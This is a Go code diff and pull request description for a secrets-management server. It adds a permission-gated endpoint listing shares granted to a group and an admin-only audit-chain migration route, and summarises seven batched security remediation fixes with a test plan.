+	groupID, err := strconv.ParseUint(chi.URLParam(r, "id"), 10, 32)
+	if err != nil {
+		h.sendError(w, "InvalidParameter", "Invalid group ID", http.StatusBadRequest, nil)
+		return
+	}
+
+	shares, err := h.coreService.ListGroupShares(r.Context(), userCtx.ActorKind(), userCtx.PrincipalID(), uint(groupID))
+	if err != nil {
+		if strings.Contains(err.Error(), "permission") || strings.Contains(err.Error(), "not authorized") {
+			h.sendError(w, "Forbidden", err.Error(), http.StatusForbidden, nil)
+			return
+		}
+		log.Printf("Error listing group shares: %v", err)
+		h.sendError(w, "InternalError", "Failed to list group shares", http.StatusInternalServerError, nil)
+		return
+	}
+	if shares == nil {
+		shares = []*models.ShareRecord{}
+	}
+
+	h.sendSuccess(w, map[string]interface{}{"shares": shares}, "")
+}
+
 // GetSharingStatusWithIndicators handles GET /api/v1/secrets/{id}/sharing-status
 func (h *ShareHandler) GetSharingStatusWithIndicators(w http.ResponseWriter, r *http.Request) {
 	userCtx := middleware.GetUserFromContext(r.Context())

--- a/server/http/router.go
+++ b/server/http/router.go
@@ -935,6 +935,9 @@ func NewRouter(cfg *config.Config, coreService *core.KeyorixCore) (http.Handler,
 			// Secrets a group can reach via shares — reveals secret names, so it needs
 			// secrets.read on top of the group-level users.read above.
 			r.With(customMiddleware.RequirePermission(permSecretsRead)).Get("/{id}/shared-secrets", shareHandler.ListGroupSharedSecrets)
+			// Share grants made TO the group (owner/secret IDs, not resolved secret
+			// content) — same sensitivity tier as shared-secrets above, same gate.
+			r.With(customMiddleware.RequirePermission(permSecretsRead)).Get("/{id}/shares", shareHandler.ListGroupShares)
 			// Adding/removing a group member confers (or revokes) every role the group
 			// holds — the same blast radius as a role grant, so gate on roles.assign
 			// (matching the group's role-grant routes below), not users.read.

--- a/server/http/router.go
+++ b/server/http/router.go
@@ -1032,6 +1032,10 @@ func NewRouter(cfg *config.Config, coreService *core.KeyorixCore) (http.Handler,
 			// Writing a checkpoint is a privileged integrity-control action — gate it
 			// above the group's audit.read with system.write (admin-level).
 			r.With(customMiddleware.RequirePermission(permSystemWrite)).Post("/checkpoint", auditHandler.WriteAuditCheckpoint)
+			// A one-time, operator-triggered migration of the audit hash chain's
+			// encoding (see internal/core/audit_chain_migrate.go) — same privilege
+			// bar as /checkpoint: it rewrites the tamper-evidence dataset itself.
+			r.With(customMiddleware.RequirePermission(permSystemWrite)).Post("/migrate-chain-encoding", auditHandler.MigrateAuditChainEncoding)
 			// ANOMALY-04: anomaly alerts expose SecretName/AccessedBy/IPAddress — raise
 			// the gate above the group's audit.read so the base viewer/system_viewer role
 			// cannot enumerate them and check whether their own access patterns were flagged.


### PR DESCRIPTION
## Summary
Combines 7 standalone follow-up fixes from the adversarial-review remediation
campaign into one PR (replacing individually-opened #1467–#1473, which are
being closed in favor of this one — matches this campaign's established
batching convention).

- **#1467** — `secret_dependencies.go`'s HTTP rotation routes (`GetProjectRotationOrder`/`GetProjectRotationPlan`)
  never re-checked project liveness after authorization, the HTTP-layer twin
  of an already-fixed gRPC gap.
- **#1468** — `CreateDynamicSecretConfig` never validated `EnvironmentID`
  belongs to `ProjectID`, letting a project-wide admin bind a config to
  another project's environment.
- **#1469** — `writeDotenv` double-quoted exported values, which does not
  suppress `$()`/backtick command substitution — mirrors the fix already
  applied to `entrypoint.sh`'s `write_output_file`.
- **#1470** — adds an opt-in `keyorix audit migrate-chain-encoding` CLI
  command (safe-by-default dry-run) to migrate pre-existing audit chains
  under the injective hash-encoding fix from PR #1452.
- **#1471** (G66) — `keyorix share group-shares` had no remote-mode branch,
  silently reading local storage even when connected to a server; adds the
  missing `GET /api/v1/groups/{id}/shares` endpoint.
- **#1472** (G02) — `DeleteGroup`/`RemoveUserFromGroup` (and SCIM
  equivalents) only guarded the install's last GLOBAL admin, not a group
  holding a project's last `roles.assign` grant.
- **#1473** (G44) — `GetPermissionBaseline`'s group-inherited grant
  resolution called `GetUserGroups` once per user (N+1 scaling with
  deployment size); batch-loaded into one query.

(#1466, the 8th fix in this batch, was already merged separately.)

## Test plan
- [x] All 7 commits cherry-picked cleanly onto a fresh `main` (2 clean
      auto-merges on `router.go`/`mock_storage_test.go`/`storage/interface.go`,
      no manual conflict resolution).
- [x] `go build`/`go vet`/`gofmt` clean across the whole combined tree.
- [x] `gosec -severity medium -exclude-generated ./...` clean (0 issues,
      796 files).
- [x] Full `go test ./...` — only the established pre-existing failures
      (`internal/securefiles` environment quirk, `TestPermissionBaseline_CSV_Headers`,
      the `TestRemoteStorage*_RealServer` family), no new regressions.
